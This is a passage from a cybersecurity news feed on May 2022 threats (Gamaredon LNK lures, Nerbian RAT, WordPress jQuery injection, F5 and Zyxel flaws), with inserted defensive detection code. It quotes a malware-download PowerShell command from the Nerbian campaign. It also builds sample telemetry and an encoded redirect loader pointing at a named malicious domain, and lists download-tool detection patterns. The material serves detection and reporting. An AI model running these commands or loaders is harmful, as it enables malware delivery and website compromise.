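        tok = token.strip('"').lower()
        if tok.startswith(("-", "/")):
            continue  # a switch, not a payload reference
        if re.match(r"https?://", tok):
            reasons.append(f"remote payload {token}")
        last = tok.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
        ext = "." + last.rsplit(".", 1)[-1] if "." in last else ""
        if host in EXPECTED_EXT and ext and ext not in EXPECTED_EXT[host]:
            reasons.append(f"{host} handed a {ext} file instead of {'/'.join(EXPECTED_EXT[host])}: {token}")
    stem = filename.lower()[:-4] if filename.lower().endswith(".lnk") else filename.lower()
    if " " in stem or stem.endswith((".pdf", ".doc", ".docx", ".txt", ".htm")):
        reasons.append("document-like display name hides a script launcher")
    return reasons


def triage_sample():
    """Constructed sample mirroring the lure: a document-named shortcut that runs
    mshta.exe (assumed host) against a remote 'precarious.xml' (hypothetical URL)."""
    name = "Plan of approach and planting explosives on the objects of critical infrastructure of Kherson.lnk"
    data = build_lnk(r"..\..\..\..\Windows\System32\mshta.exe", "http://example.invalid/precarious.xml")
    return triage_lnk(name, parse_lnk(data))
```

The parser skips the LinkTargetIDList and LinkInfo structures by their size fields, so it also reads shortcuts written by Explorer: call parse_lnk(open(path, "rb").read()) on a real file. The rule is deliberately narrow; a script-host target, a payload with the wrong extension or fetched over HTTP, and a display name that looks like a document each add one reason, so a clean shortcut to cmd.exe yields a single line and the lure above yields four.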

The government experts attribute the attack to the Russia-linked Armageddon APT (UAC-0010, aka Gamaredon, Primitive Bear, Winterflounder, or Iron Tilden), which has been involved in a long string of attacks against Ukrainian state organizations.

“As a result, the malicious program GammaLoad.PS1_v2 will be downloaded to the computer (the mechanism of taking a screenshot and sending it to the management server has been implemented).” reads the advisory published by CERT-UA. “The activity is carried out by the group UAC-0010 (Armageddon).”

The Ukrainian CERT shared the indicators of compromise (IoCs) for this campaign.


Pierluigi Paganini

(SecurityAffairs – hacking, CERT-UA)

The post Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT appeared first on Security Affairs.

Categories: Cyber Security News

Zyxel fixed firewall unauthenticated remote command injection issue

Fri, 05/13/2022 - 10:52
Zyxel addressed a critical flaw affecting Zyxel firewall devices that allows unauthenticated, remote attackers to gain arbitrary code execution.

Zyxel has moved to address a critical security vulnerability (CVE-2022-30525, CVSS score: 9.8) affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution as the “nobody” user.

The issue was discovered by Rapid7 which reported it on April 13.

Zyxel silently addressed the flaw with security updates released on April 28, 2022; Rapid7 pointed out that this choice leaves defenders in the dark and only advantages attackers.

“The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user.” reads the report published by Rapid7.

Below is the list of vulnerable products and related patches:

  • USG FLEX 100(W), 200, 500, 700: affected ZLD V5.00 through ZLD V5.21 Patch 1; patched in ZLD V5.30
  • USG FLEX 50(W) / USG20(W)-VPN: affected ZLD V5.10 through ZLD V5.21 Patch 1; patched in ZLD V5.30
  • ATP series: affected ZLD V5.10 through ZLD V5.21 Patch 1; patched in ZLD V5.30
  • VPN series: affected ZLD V4.60 through ZLD V5.21 Patch 1; patched in ZLD V5.30

According to Rapid7, more than 15,000 vulnerable systems are exposed on the internet according to the Shodan search engine. The researchers also developed a Metasploit module for this issue and published a video PoC of the attack.

“Apply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.” concludes the report.

The vendor also fixed the following issues in its VMG3312-T20A wireless router and AP Configurator:


Pierluigi Paganini

(SecurityAffairs – hacking, Zyxel)

The post Zyxel fixed firewall unauthenticated remote command injection issue appeared first on Security Affairs.

Categories: Cyber Security News

Iran-linked COBALT MIRAGE group uses ransomware in its operations

Fri, 05/13/2022 - 02:52
Iranian group used Bitlocker and DiskCryptor in a series of attacks targeting organizations in Israel, the US, Europe, and Australia.

Researchers at Secureworks Counter Threat Unit (CTU) are investigating a series of attacks conducted by the Iran-linked COBALT MIRAGE APT group. The threat actors have been active since at least June 2020 and are linked to the Iranian COBALT ILLUSION group (aka APT35, Charming Kitten, PHOSPHORUS and TunnelVision).

The researchers identified two distinct clusters of intrusions (labeled as Cluster A and Cluster B) associated with COBALT MIRAGE.

In Cluster A, the APT group uses BitLocker and DiskCryptor to conduct financially motivated, opportunistic ransomware attacks. Cluster B focuses on targeted intrusions for intelligence collection, but experts observed some of those attacks deploying ransomware as well.

Most of the victims are in Israel, the U.S., Europe, and Australia. The threat actors obtain initial access by scanning servers exposed online and exploiting known vulnerabilities such as Fortinet FortiOS vulnerabilities CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591. Starting from late September 2021, the group was observed targeting Microsoft Exchange servers by exploiting the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to deploy Fast Reverse Proxy client (FRPC) and gain remote access to the systems.

At the end of December, the researchers also observed an unfinished COBALT MIRAGE ransomware attempt, and the group's infrastructure was found hosting files related to the HiddenTear open-source ransomware project, which the group has yet to use in attacks in the wild.

“The January and March incidents typify the different styles of attacks conducted by COBALT MIRAGE. While the threat actors appear to have had a reasonable level of success gaining initial access to a wide range of targets, their ability to capitalize on that access for financial gain or intelligence collection appears limited.” concludes the report. “At a minimum, COBALT MIRAGE’s ability to use publicly available encryption tools for ransomware operations and mass scan-and-exploit activity to compromise organizations creates an ongoing threat.”


Pierluigi Paganini

(SecurityAffairs – hacking, COBALT MIRAGE)

The post Iran-linked COBALT MIRAGE group uses ransomware in its operations appeared first on Security Affairs.

Categories: Cyber Security News

New Nerbian RAT spreads via malspam campaigns using COVID-19

Thu, 05/12/2022 - 16:52
Researchers spotted a new remote access trojan, named Nerbian RAT, which implements sophisticated evasion and anti-analysis techniques.

Researchers from Proofpoint discovered a new remote access trojan called Nerbian RAT that implements sophisticated anti-analysis and anti-reversing capabilities.

The malware spreads via malspam campaigns using COVID-19 and World Health Organization (WHO) themes. The RAT takes its name from a function in the malware's source code; Nerbia is a fictional place in the novel Don Quixote.

The Nerbian RAT is written in the Go programming language and compiled for 64-bit systems, a choice that makes the malware easy to build for multiple platforms.

The malspam campaign spotted by Proofpoint started on April 26 and targeted multiple industries.

“Starting on April 26, 2022, Proofpoint researchers observed a low volume (less than 100 messages) email-borne malware campaign sent to multiple industries. The threat disproportionately impacts entities in Italy, Spain, and the United Kingdom.” reads the analysis published by Proofpoint “The emails claimed to be representing the World Health Organization (WHO) with important information regarding COVID-19.” 

Any ideas? – #WHO #COVID19 themed lure

powershell IWR -Uri https://www.fernandestechnical[.]com/pub/media/gitlog -OutFile C:\Users\Admin\AppData\Roaming\UpdateUAV.exe

— proxylife (@pr0xylife) April 28, 2022

The emails contain a weaponized Word attachment, which is sometimes compressed with RAR. Upon enabling the macros, the document provided reveals information relating to COVID-19 safety, specifically about measures for self-isolation of infected individuals.

The document contains logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI).

Once the document is opened and the macro enabled, a .bat file runs a PowerShell command that acts as a downloader for a 64-bit Golang dropper named “UpdateUAV.exe”.

The UpdateUAV executable is a dropper for the Nerbian RAT and borrows the code from various GitHub projects.
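The macro-to-.bat-to-PowerShell step above is visible in process-creation telemetry, and that shape is what to detect rather than the URL, which the actor can rotate. The added example below is not Proofpoint's code; it reconstructs process ancestry from constructed Sysmon-style records and flags any shell whose command line contains a download cmdlet, escalating when an Office application is an ancestor or when the download lands a PE file in a user-writable directory. The download URL in the sample uses a placeholder host, not the campaign's.

```python
import re
from collections import namedtuple

# One process-creation record (Sysmon event 1 / EDR telemetry shape); all samples are constructed.
Event = namedtuple("Event", "pid ppid image cmdline")

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadfile|downloadstring|"
                         r"start-bitstransfer|bitsadmin|curl|wget)\b", re.I)
OUTFILE_RE = re.compile(r"-outfile\s+\"?([^\s\"]+)", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:appdata|temp|tmp|public|downloads|programdata)\\", re.I)
PE_EXT = (".exe", ".dll", ".scr", ".com")


def ancestry(ev, by_pid, max_depth=8):
    """Parents of ev, nearest first, as far as the telemetry allows (depth-capped against pid reuse loops)."""
    chain = []
    while ev.ppid in by_pid and len(chain) < max_depth:
        ev = by_pid[ev.ppid]
        chain.append(ev)
    return chain


def detect_downloaders(events):
    """Return [(pid, [tags])] for shell processes whose command line downloads something."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if ev.image.lower() not in SCRIPT_SHELLS or not DOWNLOAD_RE.search(ev.cmdline):
            continue
        tags = ["download cmdlet in shell command line"]
        chain = [p.image.lower() for p in ancestry(ev, by_pid)]
        if OFFICE_APPS & set(chain):
            tags.append("spawned from Office: " + " > ".join(chain[::-1] + [ev.image.lower()]))
        m = OUTFILE_RE.search(ev.cmdline)
        if m:
            out = m.group(1)
            if USER_WRITABLE_RE.search(out):
                tags.append(f"writes to user-writable path {out}")
            if out.lower().endswith(PE_EXT):
                tags.append("downloaded file is a PE executable")
        findings.append((ev.pid, tags))
    return findings


def severity(tags):
    """Office ancestry, or a PE dropped into a user-writable directory, is high; a lone download is low."""
    if any(t.startswith("spawned from Office") for t in tags):
        return "high"
    if any(t.startswith("writes to user-writable") for t in tags) and "downloaded file is a PE executable" in tags:
        return "high"
    return "low" if len(tags) == 1 else "medium"


# Constructed telemetry: the Nerbian chain (Word -> cmd running a .bat -> PowerShell IWR)
# next to two benign PowerShell launches whose parent (pid 100) is not in the capture.
SAMPLE_EVENTS = [
    Event(400, 300, "WINWORD.EXE", r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\WHO-COVID19.docm"'),
    Event(410, 400, "cmd.exe", r"cmd.exe /c C:\Users\Admin\AppData\Local\Temp\run.bat"),
    Event(420, 410, "powershell.exe", r"powershell IWR -Uri https://example.invalid/pub/media/gitlog -OutFile C:\Users\Admin\AppData\Roaming\UpdateUAV.exe"),
    Event(500, 100, "powershell.exe", r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    Event(600, 100, "powershell.exe", r"powershell Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile C:\tools\tool.zip"),
]

if __name__ == "__main__":
    for pid, tags in detect_downloaders(SAMPLE_EVENTS):
        print(pid, severity(tags), tags)
```

The admin's download in the last record is still reported, but at low severity, because the telltale is the combination of ancestry and destination rather than the cmdlet alone; in a real pipeline the ancestry lookup should use process GUIDs rather than bare PIDs, which Windows reuses.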

The Nerbian RAT supports a variety of functions, such as logging keystrokes and capturing screenshots, and handles its communications over SSL.

“Proofpoint assesses with high confidence that the dropper and RAT were both created by the same entity, and while the dropper may be modified to deliver different payloads in the future, the dropper is statically configured to download and establish persistence for this specific payload at the time of analysis.” concludes the report that includes indicators of compromise (IoCs).


Pierluigi Paganini

(SecurityAffairs – hacking, RAT)

The post New Nerbian RAT spreads via malspam campaigns using COVID-19 appeared first on Security Affairs.

Categories: Cyber Security News

Massive hacking campaign compromised thousands of WordPress websites

Thu, 05/12/2022 - 09:57
Researchers uncovered a massive hacking campaign that compromised thousands of WordPress websites to redirect visitors to scam sites.

Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript code that redirects visitors to scam content.

The infections automatically redirect site visitors to third-party websites containing malicious content (i.e. phishing pages, malware downloads), scam pages, or commercial websites to generate illegitimate traffic.

“The websites all shared a common issue — malicious JavaScript had been injected within their website’s files and the database, including legitimate core WordPress files, such as:

  • ./wp-includes/js/jquery/jquery.min.js
  • ./wp-includes/js/jquery/jquery-migrate.min.js

Once the website had been compromised, attackers had attempted to automatically infect any .js files with jQuery in the names. They injected code that begins with “/* trackmyposs*/eval(String.fromCharCode…”.” reads the analysis published by Sucuri.

In some attacks, users were redirected to a landing page containing a CAPTCHA check. Upon clicking on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open.

The ads will look like they are generated from the operating system and not from a browser.

According to Sucuri, at least 322 websites were compromised as a result of this new wave of attacks and were observed redirecting visitors to the malicious website drakefollow[.]com.

“Our team has seen an influx in complaints for this specific wave of the massive campaign targeting WordPress sites beginning May 9th, 2022, which has impacted hundreds of websites already at the time of writing.” concludes the report. “It has been found that attackers are targeting multiple vulnerabilities in WordPress plugins and themes to compromise the website and inject their malicious scripts. We expect the hackers will continue registering new domains for this ongoing campaign as soon as existing ones become blacklisted.”
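The injected code Sucuri describes begins with a marker comment and an eval(String.fromCharCode(...)) wrapper, which hides the redirect destination from a plain grep for the domain. The added example below is not Sucuri's scanner; it checks every jQuery-named .js file for that wrapper, decodes the character codes (repeatedly, in case of nested layers) and reports the contacted hostnames in defanged form. The injected samples are constructed; the payload they decode to points at the drakefollow[.]com domain named in the report.

```python
import re

MARKER = "/* trackmyposs*/"  # comment the campaign prepends to its injected code
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
HOST_RE = re.compile(r"https?://([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def encode_fromcharcode(text):
    """Produce eval(String.fromCharCode(...)) for text; only used to build constructed samples."""
    return "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + "))"


def decode_fromcharcode(js, max_rounds=5):
    """Replace every String.fromCharCode(...) call with its decoded text, repeating
    so that layered encodings (fromCharCode inside fromCharCode) unwrap as well."""
    def expand(m):
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    for _ in range(max_rounds):
        if not FROMCHARCODE_RE.search(js):
            break
        js = FROMCHARCODE_RE.sub(expand, js)
    return js


def scan_js_file(path, content):
    """Finding for one file, or None when no fromCharCode-eval payload is present."""
    if MARKER not in content and "eval(String.fromCharCode" not in content:
        return None
    decoded = decode_fromcharcode(content)
    hosts = sorted({h.lower().replace(".", "[.]") for h in HOST_RE.findall(decoded)})  # defanged for reporting
    return {"file": path, "marker": MARKER in content, "hosts": hosts}


def scan_site(files):
    """files: {path: content}. Checks every .js whose name contains 'jquery', the set
    the campaign rewrites, and returns findings in path order."""
    findings = []
    for path, content in files.items():
        if "jquery" in path.lower() and path.lower().endswith(".js"):
            finding = scan_js_file(path, content)
            if finding:
                findings.append(finding)
    return findings


# Constructed sample site: the redirect loader points at the domain named in Sucuri's report.
PAYLOAD = "var s=document.createElement('script');s.src='https://drakefollow.com/app.js';document.head.appendChild(s);"
SAMPLE_FILES = {
    "./wp-includes/js/jquery/jquery.min.js": MARKER + encode_fromcharcode(PAYLOAD) + "\n/*! jQuery v3.6.0 */ !function(e,t){}();",
    "./wp-includes/js/jquery/jquery-migrate.min.js": "/*! jQuery Migrate v3.3.2 */ !function(e,t){}();",
    "./wp-content/themes/demo/js/jquery.custom.js": encode_fromcharcode(encode_fromcharcode(PAYLOAD)),  # two layers, no marker
}

if __name__ == "__main__":
    for finding in scan_site(SAMPLE_FILES):
        print(finding)
```

Because the report says the attackers register new domains as old ones get blacklisted, the decoded hostnames, not the marker string, are what to feed into blocklists and into a comparison against a clean copy of the jQuery files shipped with the WordPress version in use.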

Website admins could check if their websites have been compromised by using Sucuri’s free remote website scanner.


Pierluigi Paganini

(SecurityAffairs – hacking, WordPress websites)

The post Massive hacking campaign compromised thousands of WordPress websites appeared first on Security Affairs.

Categories: Cyber Security News

Red TIM Research (RTR) finds 2 bugs affecting F5 Traffix SDC

Thu, 05/12/2022 - 08:00
Experts at TIM research laboratory, Red Team Research (RTR), have disclosed a couple of bugs affecting F5 Traffix SDC.

Among the 45 bugs recently fixed by F5, the well-known security and application delivery vendor, 2 were detected by TIM's research laboratory, Red Team Research (RTR), as part of its bug hunting activities on the F5® Traffix® Signaling Delivery Controller (SDC) solution.

F5 Traffix Signaling Delivery Controller

F5® Traffix® Signaling Delivery Controller (SDC) solution helps operators to scale and manage services and applications in 4G/LTE networks.

It also allows the routing and exchange of data between different protocols, such as Diameter, SS7, HTTP etc. It uses an advanced transformation and flow management engine while satisfying the increasing demand for services and broadband subscribers.

The SDC solution is configured and monitored through a web user interface, and that interface is where Red TIM Research recently found the 2 security bugs.

According to the institutional website https://www.gruppotim.it/redteam, once these vulnerabilities were identified, researchers Valerio Alessandroni and Matteo Brutti, with Massimiliano Brolli leading the project, immediately started the Coordinated Vulnerability Disclosure (CVD) process, publishing only after the vendor had made the fixes available.

Detected 0day Overview

Below are the bugs detected on F5 SDC that have been published on the institutional website, available at this address: https://www.gruppotim.it/redteam

CVE-2022-27880
  • Vulnerability Description: Stored Cross-Site Scripting – CWE-79
  • Software Version: 5.1.0, 5.2.0
  • NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27880
  • CVSSv3: TBD
  • Severity: TBD
  • The F5 SDC web application does not properly validate the parameters received as input in HTTP requests before storing them on the server; the stored malicious JavaScript is then served back to end users and executed by their browsers.
CVE-2022-27662
  • Vulnerability Description: Stored Client-Side Template Injection-CWE-1336
  • Software Version: 5.1.0, 5.2.0
  • NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27662
  • CVSSv3: TBD
  • Severity: TBD
  • In Traffix Signaling Delivery Controller 5.1.0 and 5.2.0, stored client-side template injection (CSTI) was possible, which could lead to code execution.
TIM Red Team Research

This is one of the few Italian industrial research centers focused on security bugs; for a few years it has carried out “bug hunting” activities that search for undocumented vulnerabilities, leading to the issuance of a Common Vulnerabilities and Exposures (CVE) entry in the U.S. National Vulnerability Database once the Coordinated Vulnerability Disclosure (CVD) with the vendor is complete.

In two years of activity, the team has detected many 0-days in very popular products from big vendors such as Oracle, IBM, Ericsson, Nokia, Computer Associates, Siemens, QNAP, Johnson Controls and Schneider Electric, as well as from other vendors across different types of software architectures.

In two years, more than 70 CVEs have been published, 4 of them with a Critical severity (9.8 of CVSSv3 scores), 23 of them with a High severity and 36 of them with a Medium severity.

Regarding a vulnerability detected in Johnson Controls’ Metasys Reporting Engine (MRE) Web Services product, the US Cybersecurity and Infrastructure Security Agency (CISA) issued a dedicated security bulletin whose Background section lists the following: “CRITICAL INFRASTRUCTURE SECTORS, COUNTRIES/AREAS USED and COMPANY HEADQUARTERS”.

It is an all-Italian organization that issues a CVE every 6 working days, contributing internationally to the research on undocumented vulnerabilities and to the security of products used by many organizations and individuals.


Pierluigi Paganini

(SecurityAffairs – hacking, F5 Traffix)

The post Red TIM Research (RTR) finds 2 bugs affecting F5 Traffix SDC appeared first on Security Affairs.

Categories: Cyber Security News

Five Eyes agencies warn of attacks on MSPs

Thu, 05/12/2022 - 06:10
Cybersecurity authorities from the Five Eyes warn of threats targeting managed service providers (MSPs) and of potential supply chain attacks through them.

Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. this week released a joint advisory warning of threats targeting managed service providers (MSPs) and their customers.

“The cybersecurity authorities of the United Kingdom, Australia, Canada, New Zealand, and the United States have released joint Cybersecurity Advisory (CSA), Protecting Against Cyber Threats to Managed Service Providers and their Customers, to provide guidance on how to protect against malicious cyber activity targeting managed service providers (MSPs) and their customers.” reads the joint advisory. “The CSA—created in response to reports of increased activity against MSPs and their customers—provides specific guidance for both MSPs and customers aimed at enabling transparent discussions on securing sensitive data.”

The alert provides tactical actions for MSPs and customers, including:

  • Identify and disable accounts that are no longer in use.
  • Enforce MFA on MSP accounts that access the customer environment and monitor for unexplained failed authentication.
  • Ensure MSP-customer contracts transparently identify ownership of information and communications technology (ICT) security roles and responsibilities.

MSPs are a privileged target for both nation-state actors and cybercriminals, who, once they have compromised an MSP's infrastructure, can ultimately attack its customers' infrastructure by exploiting the MSP's trusted access.

The Five Eyes agencies warn of supply chain attacks targeting MSPs that could impact their customers, such as the SolarWinds attack.

Below is the list of recommendations included in the guidance:

Prevent initial compromise

  • Improve security of vulnerable devices.
  • Protect internet-facing services
  • Defend against brute force and password spraying
  • Defend against phishing

Enable/improve monitoring and logging processes

Enforce multifactor authentication (MFA)

Manage internal architecture risks and segregate internal networks

Apply the principle of least privilege

Deprecate obsolete accounts and infrastructure

Apply updates

Backup systems and data

Develop and exercise incident response and recovery plans

Understand and proactively manage supply chain risk

Promote transparency

Manage account authentication and authorization


Pierluigi Paganini

(SecurityAffairs – hacking, MSPs)

The post Five Eyes agencies warn of attacks on MSPs appeared first on Security Affairs.

Categories: Cyber Security News

CISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities Catalog

Wed, 05/11/2022 - 17:45
The US Cybersecurity and Infrastructure Security Agency (CISA) adds the critical CVE-2022-1388 flaw in F5 BIG-IP products to its Known Exploited Vulnerabilities Catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added critical CVE-2022-1388 flaw in F5 BIG-IP products to its Known Exploited Vulnerabilities Catalog.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

Last week, security and application delivery solutions provider F5 released a security notification informing customers that it had released security updates for tens of vulnerabilities in its products.

The company addressed a total of 43 vulnerabilities, the most severe one is a critical issue tracked as CVE-2022-1388 (CVSS score of 9.8). An unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses can exploit the CVE-2022-1388 flaw to execute arbitrary system commands, create or delete files, or disable services.

“This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.” reads the advisory published by the vendor.

The flaw affects the following versions:

16.1.0 – 16.1.2
15.1.0 – 15.1.5
14.1.0 – 14.1.4
13.1.0 – 13.1.4
12.1.0 – 12.1.6
11.6.1 – 11.6.5

and the vendor addressed it with the release of:

17.0.0
16.1.2.2
15.1.5.1
14.1.4.6
13.1.5

The company provided the following temporary mitigations for customers that cannot install the patched versions:

Researchers from Positive Technologies and Horizon3 Attack Team developed their own exploit code for CVE-2022-1388 and explained that the issue is trivial to exploit.

This week multiple experts confirmed that threat actors started massively exploiting the critical remote code execution vulnerability.

In most of the attacks, threat actors exploited the issue to drop webshells, but BleepingComputer reported that the F5 BIG-IP vulnerability was also exploited to wipe devices.

SANS Internet Storm Center observed at least two attacks that targeted BIG-IP devices to wipe them.

The popular researcher Kevin Beaumont also confirmed that threat actors are exploiting the flaw to erase BIG-IP devices.

Can confirm. Real world devices are being erased this evening, lots on Shodan have stopped responding. https://t.co/Rb7cyD2cnR

— Kevin Beaumont (@GossiTheDog) May 10, 2022

The CVE-2022-1388 issue has to be addressed by federal agencies by May 31, 2022.


Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2022-1388)

The post CISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attack

Wed, 05/11/2022 - 02:11
Microsoft Patch Tuesday security updates for May 2022 address three zero-day vulnerabilities, one of them actively exploited.

Microsoft Patch Tuesday security updates for May 2022 addressed three zero-day vulnerabilities, one of which is under active attack.

The IT giant fixed a total of 74 flaws in Microsoft Windows and Windows Components, .NET and Visual Studio, Microsoft Edge (Chromium-based), Microsoft Exchange Server, Office and Office Components, Windows Hyper-V, Windows Authentication Methods, BitLocker, Windows Cluster Shared Volume (CSV), Remote Desktop Client, Windows Network File System, NTFS, and Windows Point-to-Point Tunneling Protocol.

Of the 74 flaws addressed by the company, seven are rated Critical, 66 are rated Important, and one is rated Low in severity. Seven of these issues were reported through the ZDI program.

The zero-day flaw under active attack, tracked as CVE-2022-26925, is a Windows LSA Spoofing vulnerability.

The flaw can be exploited by an unauthenticated attacker to coerce a domain controller into authenticating to an attacker-controlled server using NTLM.

“An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM. This security update detects anonymous connection attempts in LSARPC and disallows it.” read the advisory published by Microsoft.

The other zero-day issues addressed by Microsoft are a Windows Hyper-V Denial of Service flaw, tracked as CVE-2022-22713, and CVE-2022-29972, an issue in Insight Software's Magnitude Simba Amazon Redshift ODBC Driver.

The company also fixed a Windows Network File System Remote Code Execution Vulnerability, tracked as CVE-2022-26937. Remote, unauthenticated attackers can exploit the issue to execute code in the context of the Network File System (NFS) service on affected systems. Experts pointed out that NFS isn’t enabled by default, but it is a common option in environments where Windows systems and other OSes coexist.

The complete list of vulnerabilities addressed with the release of Microsoft Patch Tuesday security updates for May 2022 is available here.


Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Patch Tuesday security updates for May 2022)

The post Microsoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attack appeared first on Security Affairs.

Categories: Cyber Security News

EU condemns Russian cyber operations against Ukraine

Wed, 05/11/2022 - 02:03
The European Union condemns the cyberattacks conducted by Russia against Ukraine, which targeted the satellite KA-SAT network.

The European Union accused Russia of the cyberattack that hit the satellite KA-SAT network in Ukraine, operated by Viasat, on February 24.

This cyberattack caused communication outages and disruptions in Ukraine and also impacted several EU Member States: 5,800 Enercon wind turbines in Germany became unreachable due to the spillover from the attack. Security researchers at SentinelLabs who investigated the attack identified a previously undetected destructive wiper, tracked as AcidRain, that hit routers and modems.

“The European Union and its Member States, together with its international partners, strongly condemn the malicious cyber activity conducted by the Russian Federation against Ukraine, which targeted the satellite KA-SAT network, operated by Viasat.” reads the press release published by the European Union.

“This unacceptable cyberattack is yet another example of Russia’s continued pattern of irresponsible behaviour in cyberspace, which also formed an integral part of its illegal and unjustified invasion of Ukraine.”

The EU statement adds that the conduct of the Russian Federation in cyberspace, the fifth domain of warfare, runs contrary to the norms of responsible state behaviour endorsed by all UN Member States, Russia included.

EU members argued that cyberattacks targeting Ukraine can spill over into other countries, as the Viasat incident did, and put European critical infrastructure, businesses and citizens at risk.

“The European Union, working closely with its partners, is considering further steps to prevent, discourage, deter and respond to such malicious behavior in cyberspace. The European Union will continue to provide coordinated political, financial and material support to Ukraine to strengthen its cyber resilience.” concludes the press release. “Russia must stop this war and bring an end to the senseless human suffering immediately.”

The UK Foreign, Commonwealth & Development Office and Foreign Secretary Elizabeth Truss also published a statement formally attributing to Russia the attack on Viasat, which was launched about an hour before the invasion began.

“Russia has been behind a series of cyber-attacks since the start of the renewed invasion of Ukraine, the EU, UK, US and other allies have announced today (10 May). The most recent attack on communications company Viasat in Ukraine had a wider impact across the continent, disrupting wind farms and internet users in central Europe.” reads the statement.




Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)

The post EU condemns Russian cyber operations against Ukraine appeared first on Security Affairs.

Categories: Cyber Security News
